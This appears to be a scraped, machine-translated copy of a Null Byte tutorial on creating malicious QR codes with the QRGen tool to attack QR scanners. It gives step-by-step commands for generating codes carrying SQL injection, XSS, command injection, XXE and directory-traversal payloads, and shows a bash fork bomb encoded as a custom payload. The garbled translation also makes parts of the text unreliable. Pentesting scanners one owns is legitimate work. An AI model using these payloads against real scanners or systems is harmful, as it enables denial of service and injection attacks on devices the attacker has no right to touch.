قالب وردپرس درنا توس
Home / Tips and Tricks / Create malicious QR codes for hack phones and other scanners «Null Byte :: WonderHowTo

Create malicious QR codes for hack phones and other scanners «Null Byte :: WonderHowTo



QR codes are everywhere, from product packaging to boarding passes for airlines. They make the scanners they read a useful target for hackers. Errors in many of these proprietary scanning devices can exploit common vulnerabilities through exploits that are packaged in custom QR codes.

A tool called QRGen can create malicious QR codes and even encode custom payloads. These attacks are huge because people can not read or understand the information contained in a QR code without scanning it. This can cause any device that tries to decrypt the code to be exposed to the exploit it contains. Even QR code scanners such as smartphones can be vulnerable to such attacks, as it has been found that QR codes are able to lure users of iPhones to malicious websites.

What are QR Codes?

QR codes are machine-readable data formats. This is useful for everything that needs to be scanned automatically. Prior to the QR codes, there were several other formats, called linear barcodes, in which data was stored in a way that was easy for machines to read. You've probably seen a UPC barcode on products like the one below, as it is often used to identify items for sale so that cashiers can scan them for a faster checkout.

2D barcodes for more data

The answer to the limitation of linear Barcodes were 2D barcodes that provide greater physical stability against physical damage to the information they contain Some of the first 2D codes looked like the following, which is still widely used today.

Aztec code is a machine-readable 2D or matrix code that is similar in many ways to a QR code and may contain more information than a linear bar code. Originally developed for logistics, it may be used on packages and envelopes when more data needs to be stored than a linear barcode can deliver.

Other types of 2D barcodes can contain an extremely dense amount of data. For example, the PDF417 format on the back of most US driving licenses can encode up to 1800 ASCII characters.

PDF417 codes as above can encode text, numbers, files, and actual bytes of data, and they are more error resistant than linear barcodes. Companies like FedEx use a combination of PDF417 and other barcodes on delivery notes to automate delivery and tracking.

What can codes do with more data?

QR codes were introduced in the automotive industry to keep track of automobiles as they were manufactured, but quickly grew in popularity outside of this industry. Similar to other 2D codes, QR codes can pack a lot of data and even work if they are reduced in resolution or otherwise corrupted.

A single QR code can contain 4,296 ASCII codes, making it possible to be much more creative about what you can do with them. You can even format the data to trigger actions when a reader recognizes them.

A fascinating use of QR codes, which is made possible by their greater data capacity, is to manage Wi-Fi connections without having to share the password in plain text. By coding the following string, you can create a QR code that automatically logs Android users into a Wi-Fi network.

  WIFI: S: ; T: ; P: ; H: ; 

Anyone scanning the QR code on an Android device will automatically be logged in to the encrypted Wi-Fi network. View this code to see how much data a QR code can pack:

This tiny code contains the following text: [19659018] Version 40 QR code can contain up to 1852 characters.
A QR code (abbreviated as a quick response code) is a type of matrix bar code (or two-dimensional code) designed to be read by smartphones.
The code consists of black modules arranged in a square pattern on a white background. The coded information may be text, a URL or other data.
The QR code was created in 1994 by the Toyota subsidiary Denso Wave and is one of the most popular types of two-dimensional barcodes.
The QR code has been designed so that its content can be decoded at high speed.
The technology was widely used in Japan and South Korea. The UK is the seventh largest consumer of QR codes.
Although QR codes were originally used to track parts in vehicle construction, they are now used in a much broader context.
This includes both commercial tracking applications and comfort-oriented applications for mobile phone users (so-called mobile tagging).
QR codes can be used to display text to the user, add a vCard contact to the user's device, open a Uniform Resource Identifier (URI), or write an e-mail or text message.
Users can create and print their own QR codes so others can scan and use them by visiting one of several paid and free QR code generating websites or apps.

The text in the image is larger than the QR code itself! The capacity makes QR codes both powerful and dangerous because people can not understand the data they contain without scanning them first.

QRgen for QR code hacking

Because a human can not detect a malicious QR code before actually scanning it The relatively large payload of a QR code can be beneficial to a hacker, especially in combination with vulnerable devices. The tool we use today to create it is called QRGen. It picks up a payload and encodes it with Python into a QR code.

QRGen has a built-in library that contains many popular exploits. This is very useful if you have time to sit down with the same device as you. & # 39; I am looking for exploit and find out what works. A pentester who wants to check everything using a QR code scanner can lead to unexpected behavior of the scanner by purchasing the same scanner and running the exploits.

The categories of payload available in QRGs can be accessed Use the flag -l and a number while executing the script. The number and payload type are listed below.

0: SQL Injections
1: XSS
2: Injection
3: Format String
4: XXE
5: fuzzing string
6: SSI injection
7: LFI / Directory Traversal

To create a bunch of malicious QR codes that fuzzing -Payloads included, only need to be executed QRGen.py -l 5 to create many codes for testing.

What you need

To use QRGs, Python3 must be installed. Since it is cross-platform, it should be possible on any operating system. You also need some Python libraries, including qrcode, Pillow and argparse, which we install during the setup.

Step 1: Install QRGen

To start with QRGen, we need to download ] the GitHub repository. To do this, run the following command in a terminal window.

  ~ $ git clone https://github.com/h0nus/QRGen

Cloning in & # 39; QRGen & # 39; ...
remote: list objects: 86, done.
remote: count objects: 100% (86/86), done.
remote: compress objects: 100% (78/78), done.
Remote: A total of 86 (Delta 26), reused 4 (Delta 1), pack-reused 0
Unpack objects: 100% (86/86), done. 

When the repo finishes downloading, change ( cd ) to its directory and list ( ls ) the contents to find it the request file.

  ~ $ cd QRGen
~ / QRGen $ ls

demo.gif qrgen.py README.md requirements.txt words 

Now you need to make sure that all required libraries are installed. To do this, run the installation file with the following command:

  ~ / QRGen $ pip3 install -r requirements.txt

Collect Qrcode (from -r requirements.txt (line 1))
Download from https://files.pythonhosted.org/packages/42/87/4a3a77e59ab7493d64da1f69bf1c2e899a4cf81e51b2baa855e8cc8115be/qrcode-6.1-py2.py3-none-any.whl
Requirement already met: Pillow in / usr / lib / python3 / dist-packages (from -r requirements.txt (line 2)) (5.4.1)
Collect arguments (from -r requirements.txt (line 3))
Download from https://files.pythonhosted.org/packages/f2/94/3af39d34be01a24a6e65433d19e107099374224905f1e0cc6bbe1fd22a2f/argparse-1.4.0-py2.py3-none-any.whl
Prerequisite already met: six in / usr / lib / python3 / dist-packages (from qrcode -> - r requirements.txt (line 1)) (1.12.0)
Install collected packages: qrcode, argparse
Argparse-1.4.0 qrcode-6.1 successfully installed 

If that does not work, you can also install it with this alternative command.

  ~ / QRGen $ python3 -m pip install -r requirements.txt 

Step 2: Generate malicious QR codes from a payload type

Now you should be able to run the script by typing python3 qrgen.py .

  Enter ~ / QRGen $ python3 qrgen.py

e88 88e 888 88e e88 # Y88
d888 888b 888 888D d888 & #; Y, ee, 888 8e
C8888 8888D 888 88 "C8888 eeee d88 88b 888 88b
Y888 888P 888b, Y888 888P 888, 888 888
88 88 888 88b, 88 88 YeeP 888 888
b
8b, QRGen ~ v0.1 ~ of h0nus

Usage: qrgen.py -l [number]
Usage: qrgen.py -w [/path/to/custom/wordlist]

Payload lists:
0: SQL injections
1: XSS
2: Command input
3: format string
4: XXE
5: String fuzzing
6: SSI injection
7: LFI / Directory Traversal

Tool for generating bad QRCodes for smearing QRCode parsers / readers

optional arguments:
-h, --help show this help message and finish it

Options for QRGs:
--list {0,1,2,3,4,5,6,7}, -l {0,1,2,3,4,5,6,7}
Set the word list to use
--wordlist WORDLIST, -w WORDLIST
Use a custom word list

Watch it everywhere, even in the dumbest spot. 

As you can see, it's pretty easy to create payloads. First, we create a payload with format string payloads. Do QRGs with the following argument:

  ~ / QRGen $ python3 qrgen.py -l 5

e88 88e 888 88e e88 # Y88
d888 888b 888 888D d888 & #; Y, ee, 888 8e
C8888 8888D 888 88 "C8888 eeee d88 88b 888 88b
Y888 888P 888b, Y888 888P 888, 888 888
88 88 888 88b, 88 88 YeeP 888 888
b
8b, QRGen ~ v0.1 ~ of h0nus

Payload path generated ..
Path already deleted or deleted.
46 payloads generated!
Last generated payload is opened ...
Thank you for using QRGen from H0nus. 

A series of QR codes are generated, and the last one created automatically opens.

On If you see the rest of your payload, you can enter cd genqr to go to the directory where it was created, and ls its contents.

  ~ / QRGen $ cd genqr
~ / QRGen / genqr $ ls

payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png
payload-18.png payload-27.png payload-36.png payload-45.png 

Step 3: Coding Custom Payloads

To encode a custom payload, we can first create a text file that contains that what we want to encode. Each line will be a new payload. First, we can create a next text file by entering nano badstuff.txt to create a text file.

  ~ / QRGen / genqr $ nano badstuff.txt 

In this text file we can set our payload. The bottom is a fork bomb. Does it work with a QR code scanner? Who knows.

: () {: |: &} ;: 

We can save it by pressing Control X then Y and Enter to confirm your storage. Now you should see a text file with your payload.

  ~ / QRGen / genqr $ ls

badstuff.txt payload-18.png payload-27.png payload-36.png payload-45.png
payload-0.png payload-19.png payload-28.png payload-37.png payload-4.png
payload-10.png payload-1.png payload-29.png payload-38.png payload-5.png
payload-11.png payload-20.png payload-2.png payload-39.png payload-6.png
payload-12.png payload-21.png payload-30.png payload-3.png payload-7.png
payload-13.png payload-22.png payload-31.png payload-40.png payload-8.png
payload-14.png payload-23.png payload-32.png payload-41.png payload-9.png
payload-15.png payload-24.png payload-33.png payload-42.png
payload-16.png payload-25.png payload-34.png payload-43.png
payload-17.png payload-26.png payload-35.png payload-44.png 

To write your payload into a QR code, we use the flag -w . Assuming that your payload file is named "badstuff.txt", the command should look like this (remember to return to the QRGen directory first).

  ~ / QRGen / genqr $ cd ..
~ / QRGen $ python3 qrgen.py -w & # 39; /username/QRGen/genqr/badstuff.txt'

e88 88e 888 88e e88 # Y88
d888 888b 888 888D d888 & #; Y, ee, 888 8e
C8888 8888D 888 88 "C8888 eeee d88 88b 888 88b
Y888 888P 888b, Y888 888P 888, 888 888
88 88 888 88b, 88 88 YeeP 888 888
b
8b, QRGen ~ v0.1 ~ by h0nus

Payload path available, continued ...
Path already deleted or deleted.
1 payload generated!
Last generated payload is opened ...
Thank you for using QRGen from H0nus. 

The QR code below is generated for my fork bomb payload.

Not all QR codes to scan are advisable

QR codes can encode a variety of information. As we learned today, they can even be formatted so that a device performs actions such as connecting to a Wi-Fi network. Scanning a QR code is therefore risky because a person is unable to read the information before the device is exposed to the payload it contains. If you're scanning a QR code that looks suspicious, look for what the code is trying to start, and do not connect to a Wi-Fi network, and do not navigate to a shortened link.

Most QR codes should be secure Scanning on a smartphone, scanning today's data generated on a device to scan tickets or boarding passes can lead to a bizarre behavior of the device. Do not scan payload data on a scanner that you need immediately after an event or job, or on a scanner that you do not have permission to test.

I hope you liked this Guide to Generating Harmful QR Codes to Exploit Scanning Devices! If you have questions about this tutorial on QR codes or have a comment, please see the comments section below. You can also contact me on Twitter @KodyKinzie .

Do Not Miss: ] Uncover hidden subdomains to reveal internal services with CT Exposer

Cover Photo and Screenshots of Kody / Null Byte




Source link